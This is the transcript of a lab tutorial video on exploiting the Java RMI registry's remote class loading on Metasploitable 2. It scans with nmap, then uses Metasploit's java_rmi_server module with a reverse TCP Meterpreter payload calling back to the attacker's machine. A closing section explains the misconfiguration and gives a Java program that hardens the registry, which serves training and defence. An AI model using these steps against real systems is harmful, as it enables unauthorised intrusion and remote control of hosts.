Hey guys. So in this video, I want to show you guys how you can exploit Java RMI services with the Metasploit Framework. Java RMI stands for Remote Method Invocation, or just RMI. It's a mechanism that allows an object that exists in one Java Virtual Machine to access and call methods that are contained in another Java Virtual Machine. So basically, it's the same thing as an RPC, but in an object-oriented paradigm instead of a procedural one. So this allows for communication between Java programs that are not in the same address space.
So this vulnerability is due to the default configuration of the RMI registry and RMI activation services allowing the loading of classes from a remote URL. So that's what it does: it allows classes to get loaded from a remote URL, and we can take advantage of this and exploit it. The RMI protocol makes use of two other protocols for its on-the-wire format: Java object serialization and HTTP. The object serialization protocol is used to marshal call and return data. The HTTP protocol is used to POST a remote method invocation and obtain return data when circumstances warrant. So first, we need to see if the target is vulnerable to this particular exploit, because we want to check for that port.
So let's do an Nmap scan on our target machine. For this video, I'm going to be using Metasploitable 2, which I actually have open in my VirtualBox right here. I just opened it up and looked for the IP here; just type ifconfig and you'll see the IP. So let's go back to our Kali machine, and now type nmap followed by our Metasploitable 2 IP address and Enter. And now let's see if our RMI registry port is open or not.
So as you can see, these are all the ports that are open right now, and right here our RMI registry is open, which is 1099. For our next step, we've got to figure out what we can use to verify whether this particular machine, this particular IP address, is vulnerable on the RMI registry or not. So all you've got to do is use the Nmap scripting engine: just type nmap and then --script=rmi-vuln-classloader, because that's what we're looking for, the class loader. Then -p, where we're going to be targeting the port, which is 1099.
That's where the RMI registry is. And then our IP address, which is our Metasploitable 2 IP address, 192.168.0.195. And Enter. Looks like it's down. I think the IP changed. Let's try it again.
Yes, this one will do it. So let's go back to the virtual machine and type that in, 192.168.0.190. Awesome. So our target is vulnerable: the RMI registry default configuration makes remote code execution possible. So now, our next step is to open up msfconsole, because we're going to be using the Metasploit Framework for this.
So open that up and look for this particular exploit, which is the Java RMI exploit. I'm just going to type search java rmi. Awesome. So yeah, we got a lot of exploitable stuff, three or four exploits. And I'm going to be picking this one right here. So just copy that and type use and paste. Now let's look for the options we need to set.
And that's it. So we need to set our remote host, which is our Metasploitable 2 machine: set RHOSTS 192.168.0.198. Now let's check with show options to see that our RPORT is set; we don't need anything else right now. Okay, awesome. Our next step is to just see if it runs.
Let's run and see if it's working. Great. So, as you can see, the class loader is enabled and the execution was completed. Our next step is the exploitation phase. For this, we can see that the scanner detected a Java RMI endpoint on port 1099 right here, which suggests that the target may be vulnerable. Now it's time to exploit the same service with this particular module.
The multi one right here: copy that, then use it over here and paste, because the first one was a scanner at the auxiliary level, and now we're trying to actually exploit. Enter. Great. Now, let's look at the options. So our RHOSTS is not set. So let's set that up: set RHOSTS 192.168.0.190, Enter. Great.
So now we have, okay, we also have the description for this module, Java RMI server: it takes advantage of the default configuration of the RMI registry and the activation services. So this allows us, like I was mentioning earlier, to load classes from any remote URL, an HTTP URL, because it invokes a method in the RMI Distributed Garbage Collector, which is available via every RMI endpoint. And this can be used against both rmiregistry and rmid, and also against most other custom-made RMI endpoints as well. One thing though, it doesn't work against Java Management Extension (JMX) ports, since those do not support remote class loading, unless another RMI endpoint is active in the same Java process; that's the only time it is possible. And RMI method calls do not support or require any sort of authentication either.
Alright, so now let's go back and see: we have our RHOSTS set and our RPORT set. Our next step is to set a payload so that we can have a connection back, and I want to go for a reverse TCP shell connection. You can just type show payloads. And like I said, I'm looking for something like a reverse TCP shell connection that can give me a Meterpreter shell. So I'm going to go for a reverse TCP connection back that can give me that Meterpreter shell. This looks good. Let's copy that and set the payload: set payload and paste it.
Enter. Awesome. Now let's again look at the options and see what options we need to set. So we see our RHOSTS is set, perfect. We need to set up our LHOST though, so let's open up another tab and type ifconfig again to see what our Kali Linux IP is, which is 197. So set LHOST
192.168.0.197. Enter. Now let's look at the options again, show options. Awesome. Our LHOST is set, our RHOSTS is set, and our RPORT and LPORT are set.
And now we've got to run this exploit. So just type run and see if it works, if we get a Meterpreter shell. Awesome, so we got our Meterpreter shell open. As you can see, the exploit started a handler on our system, you can see the handler has been started, and then it sends the RMI method call to the target right here, and a Meterpreter shell came down and opened. Now if you type sessions, it shows all the sessions that are open. So we got two sessions open. That's awesome. You can use either one to access a Meterpreter shell, because both are Meterpreter shells.
So I'm going to type sessions -i, which will interact with the session I need, and then I'm going to type 2, because Meterpreter shell 2 is open, right? So I'm just going to go for 2 and Enter. Great. There you go. There's our Meterpreter. And as I mentioned before, Meterpreter is a very powerful shell.
It'll give you access to a lot of exploits and a lot of vulnerability tools. You can check by typing sysinfo to see the information about your system. There you go. It is Metasploitable, that's our training machine. That's it guys.
I hope you enjoyed this video. We'll see in the next one.
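The weakness the video leans on is configuration, not a code bug: an RMI registry that accepts codebase URLs from the peer, listens on every interface, and deserializes whatever arrives. As an added example that is not part of the video or of Metasploit, the Java program below starts an RMI registry with each of those defaults turned off. It assumes Java 9 or later (for the ObjectInputFilter API); the class names HardenedRegistry, LoopbackServerSocketFactory and Greeter are hypothetical and exist only for this illustration.

```java
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIServerSocketFactory;
import java.rmi.server.UnicastRemoteObject;

// Hypothetical hardened registry written for this example; not part of any project.
public class HardenedRegistry {

    // Minimal remote interface so the registry has something to serve.
    public interface Greeter extends Remote {
        String greet(String name) throws RemoteException;
    }

    // Binds the registry and every exported object to loopback only, so port 1099
    // is not reachable from other hosts the way it was on Metasploitable 2.
    static final class LoopbackServerSocketFactory implements RMIServerSocketFactory {
        @Override
        public ServerSocket createServerSocket(int port) throws IOException {
            return new ServerSocket(port, 50, InetAddress.getLoopbackAddress());
        }
    }

    public static void main(String[] args) throws Exception {
        // 1. Ignore codebase URLs announced by the peer and load classes only from
        //    the local classpath. This has been the default since Java 7u21, but
        //    pinning it here survives a launch script that flips it back.
        System.setProperty("java.rmi.server.useCodebaseOnly", "true");

        // 2. Process-wide deserialization allow-list for the application's own
        //    remote methods. Only the types RMI plumbing needs pass; "!*" rejects
        //    every other class before any constructor or readObject() runs, so a
        //    gadget chain is never instantiated. (The Java 9+ registry already
        //    applies its own built-in allow-list to registry lookups/binds.)
        ObjectInputFilter.Config.setSerialFilter(ObjectInputFilter.Config.createFilter(
                "maxdepth=10;"
              + "java.lang.String;java.lang.Number;java.lang.reflect.Proxy;"
              + "java.rmi.**;sun.rmi.**;"
              + "!*"));

        // 3. Create the registry on loopback instead of 0.0.0.0.
        RMIServerSocketFactory loopback = new LoopbackServerSocketFactory();
        Registry registry = LocateRegistry.createRegistry(1099, null, loopback);

        // Export a service object through the same loopback-only factory and bind it.
        Greeter greeter = name -> "hello, " + name;
        Greeter stub = (Greeter) UnicastRemoteObject.exportObject(greeter, 0, null, loopback);
        registry.bind("Greeter", stub);

        System.out.println("registry listening on 127.0.0.1:1099, remote class loading off");
        Thread.currentThread().join(); // keep the JVM alive so the registry stays up
    }
}
```

Compile and run it with `javac HardenedRegistry.java && java HardenedRegistry`, then repeat the video's `nmap --script=rmi-vuln-classloader -p 1099` check from another host: the port does not answer at all, and from the same host the script no longer reports the class-loader weakness because the codebase annotation is ignored. The loopback binding is the part that matters most in practice; a registry that must be reachable over the network should at least keep `java.rmi.server.useCodebaseOnly=true`, run on a current JDK whose registry applies the built-in filter (tunable via the `sun.rmi.registry.registryFilter` system property), and sit behind firewall rules that limit who can reach 1099.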